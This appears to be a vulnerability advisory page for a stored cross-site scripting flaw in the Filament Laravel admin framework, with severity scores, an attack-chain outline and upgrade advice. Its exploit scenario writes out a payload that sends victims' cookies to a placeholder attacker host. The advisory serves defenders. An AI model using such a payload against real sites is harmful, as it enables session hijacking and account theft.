Skip to main content

Filament EUVDEUVD-2026-38395

| CVE-2026-48167 MEDIUM
Cross-site Scripting (XSS) (CWE-79)
2026-06-22 GitHub_M GHSA-3fc8-8hp6-6jr4
6.4
CVSS 3.1 · Vendor: GitHub_M
Share

Severity by source

Vendor (GitHub_M) PRIMARY
6.4 MEDIUM
AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
vuln.today AI
6.4 MEDIUM

PR:L reflects required write access to the affected column; S:C captures cross-user browser execution; UI:N applies because stored payload fires automatically on page load.

3.1 AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
4.0 AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N

Primary rating from Vendor (GitHub_M).

CVSS VectorVendor: GitHub_M

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
Attack Vector
Network
Attack Complexity
Low
Privileges Required
Low
User Interaction
None
Scope
Changed
Confidentiality
Low
Integrity
Low
Availability
None

Lifecycle Timeline

2
Patch available
Jun 22, 2026 - 23:02 EUVD
Analysis Generated
Jun 22, 2026 - 22:30 vuln.today

DescriptionCVE.org

Filament is a collection of full-stack components for accelerated Laravel development. From 4.0.0 until 4.11.5 and 5.6.5, the ImageColumn and ImageEntry components render raw database values without escaping HTML. Where the data passed to these components isn't validated, an attacker could plant malicious HTML or JavaScript and achieve stored XSS that executes for users who view the table or schema. This vulnerability is fixed in 4.11.5 and 5.6.5.

AnalysisAI

Stored cross-site scripting in Filament's ImageColumn and ImageEntry components allows low-privileged authenticated attackers to plant malicious HTML or JavaScript into database-backed image fields, which then executes in the browsers of any user who views the affected table or schema. Affected versions span 4.0.0 through the pre-fix releases across both the v4 and v5 branches of this widely-used Laravel admin panel framework. …

Unlock full vulnerability intelligence

  • Risk assessment & exploitation conditions
  • Attack chain visualization
  • Remediation with exact patch versions
  • Threat intelligence from 22 sources
  • Personal watchlist & email alerts

Free forever · No credit card required

Attack ChainAIDerived

Hypothetical attack flow derived from CVE metadata

Access
Authenticate as low-privileged user
Delivery
Submit malicious HTML/JS payload into image field
Exploit
Payload persisted to database unescaped
Execution
Admin or user views affected Filament table/schema
Persist
Stored XSS executes in victim browser
Impact
Session token or credentials exfiltrated

Vulnerability AssessmentAI

Exploitation Exploitation requires the attacker to have write access to a database column that is rendered by an ImageColumn or ImageEntry component in a Filament table or infolist - this is the CVSS PR:L constraint. … Additional conditions and limiting factors are described in the full assessment.
Risk Assessment The CVSS base score of 6.4 (AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N) reflects a realistic stored XSS profile: network-accessible, low complexity, requiring only low-privilege access to plant the payload, with scope change because execution occurs in other users' browsers. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in.
Exploit Scenario An attacker with low-privileged authenticated access to a Filament-backed application - such as a user who can submit a profile image URL or any form field that writes to a column rendered by ImageColumn - submits a value such as `"><img src=x onerror=fetch('https://attacker.example/steal?c='+document.cookie)>` instead of a valid image URL. The malicious string is stored in the database without sanitization. …
Remediation Upgrade to Filament 4.11.5 (for v4 branch users) or 5.6.5 (for v5 branch users) - these are the vendor-confirmed fixed releases per the GitHub Security Advisory GHSA-3fc8-8hp6-6jr4 at https://github.com/filamentphp/filament/security/advisories/GHSA-3fc8-8hp6-6jr4. … Detailed patch versions, workarounds, and compensating controls in full report.

Threat intelligence, references, and detailed analysis are available after sign-in.

Share

EUVD-2026-38395 vulnerability details – vuln.today

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy